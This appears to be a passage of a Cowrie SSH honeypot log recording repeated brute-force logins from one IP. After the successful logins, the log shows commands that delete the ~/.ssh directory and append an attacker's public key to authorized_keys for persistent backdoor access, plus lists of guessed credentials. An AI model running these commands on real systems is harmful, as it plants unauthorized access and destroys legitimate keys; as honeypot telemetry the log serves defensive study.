{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:03:21.147740Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:03:21.460336Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:21.461271Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38528,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ab5a9221d0e","protocol":"ssh","message":"New connection: 212.227.235.229:38528 (1.2.3.4:22) [session: 3ab5a9221d0e]","sensor":"my-vps","timestamp":"2025-09-08T22:03:21.768686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:21.769451Z","src_ip":"212.227.235.229","session":"3ab5a9221d0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:22.078923Z","src_ip":"212.227.235.229","session":"3ab5a9221d0e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:23.357550Z","src_ip":"212.227.235.229","session":"3ab5a9221d0e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:24.669007Z","src_ip":"212.227.235.229","session":"3ab5a9221d0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38534,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d6794a8095a","protocol":"ssh","message":"New connection: 212.227.235.229:38534 (1.2.3.4:22) [session: 6d6794a8095a]","sensor":"my-vps","timestamp":"2025-09-08T22:03:24.977720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:24.978596Z","src_ip":"212.227.235.229","session":"6d6794a8095a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:25.289914Z","src_ip":"212.227.235.229","session":"6d6794a8095a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:03:26.573421Z","src_ip":"212.227.235.229","session":"6d6794a8095a"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:26.886103Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:26.887142Z","src_ip":"212.227.235.229","session":"6d6794a8095a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50692,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2727eae909c","protocol":"ssh","message":"New connection: 212.227.235.229:50692 (1.2.3.4:22) [session: a2727eae909c]","sensor":"my-vps","timestamp":"2025-09-08T22:03:29.054801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:29.055611Z","src_ip":"212.227.235.229","session":"a2727eae909c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:29.346063Z","src_ip":"212.227.235.229","session":"a2727eae909c"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"Welcome1","message":"login attempt [odoo/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:30.547350Z","src_ip":"212.227.235.229","session":"a2727eae909c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:31.839857Z","src_ip":"212.227.235.229","session":"a2727eae909c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54348,"dst_ip":"1.2.3.4","dst_port":22,"session":"19f5dc515e82","protocol":"ssh","message":"New connection: 212.227.235.229:54348 (1.2.3.4:22) [session: 19f5dc515e82]","sensor":"my-vps","timestamp":"2025-09-08T22:03:37.220231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:37.242951Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:37.495698Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme123","message":"login attempt [root/changeme123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:03:38.416134Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:03:38.871132Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:03:38.871825Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:03:38.872800Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:39.076680Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:03:39.537606Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:03:39.538285Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:03:39.743193Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:39.744052Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54362,"dst_ip":"1.2.3.4","dst_port":22,"session":"656118d66fe2","protocol":"ssh","message":"New connection: 212.227.235.229:54362 (1.2.3.4:22) [session: 656118d66fe2]","sensor":"my-vps","timestamp":"2025-09-08T22:03:39.946058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:39.946797Z","src_ip":"212.227.235.229","session":"656118d66fe2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:40.152317Z","src_ip":"212.227.235.229","session":"656118d66fe2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:41.014324Z","src_ip":"212.227.235.229","session":"656118d66fe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34988,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f0fec819d7a","protocol":"ssh","message":"New connection: 212.227.235.229:34988 (1.2.3.4:22) [session: 4f0fec819d7a]","sensor":"my-vps","timestamp":"2025-09-08T22:03:41.340255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:41.341190Z","src_ip":"212.227.235.229","session":"4f0fec819d7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:41.650242Z","src_ip":"212.227.235.229","session":"4f0fec819d7a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:42.221445Z","src_ip":"212.227.235.229","session":"656118d66fe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54370,"dst_ip":"1.2.3.4","dst_port":22,"session":"46b0c0c5db15","protocol":"ssh","message":"New connection: 212.227.235.229:54370 (1.2.3.4:22) [session: 46b0c0c5db15]","sensor":"my-vps","timestamp":"2025-09-08T22:03:42.424517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:42.426179Z","src_ip":"212.227.235.229","session":"46b0c0c5db15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:42.629522Z","src_ip":"212.227.235.229","session":"46b0c0c5db15"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345","message":"login attempt [centos/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:42.926886Z","src_ip":"212.227.235.229","session":"4f0fec819d7a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:03:43.492013Z","src_ip":"212.227.235.229","session":"46b0c0c5db15"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:43.697633Z","src_ip":"212.227.235.229","session":"19f5dc515e82"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:43.698492Z","src_ip":"212.227.235.229","session":"46b0c0c5db15"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:44.238108Z","src_ip":"212.227.235.229","session":"4f0fec819d7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45858,"dst_ip":"1.2.3.4","dst_port":22,"session":"d91dff40392a","protocol":"ssh","message":"New connection: 212.227.235.229:45858 (1.2.3.4:22) [session: d91dff40392a]","sensor":"my-vps","timestamp":"2025-09-08T22:03:45.839966Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57540,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e3febe80bcd","protocol":"ssh","message":"New connection: 212.227.235.229:57540 (1.2.3.4:22) [session: 9e3febe80bcd]","sensor":"my-vps","timestamp":"2025-09-08T22:03:45.870939Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32906,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d455e592367","protocol":"ssh","message":"New connection: 212.227.235.229:32906 (1.2.3.4:22) [session: 0d455e592367]","sensor":"my-vps","timestamp":"2025-09-08T22:03:49.478616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:49.479493Z","src_ip":"212.227.235.229","session":"0d455e592367"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellma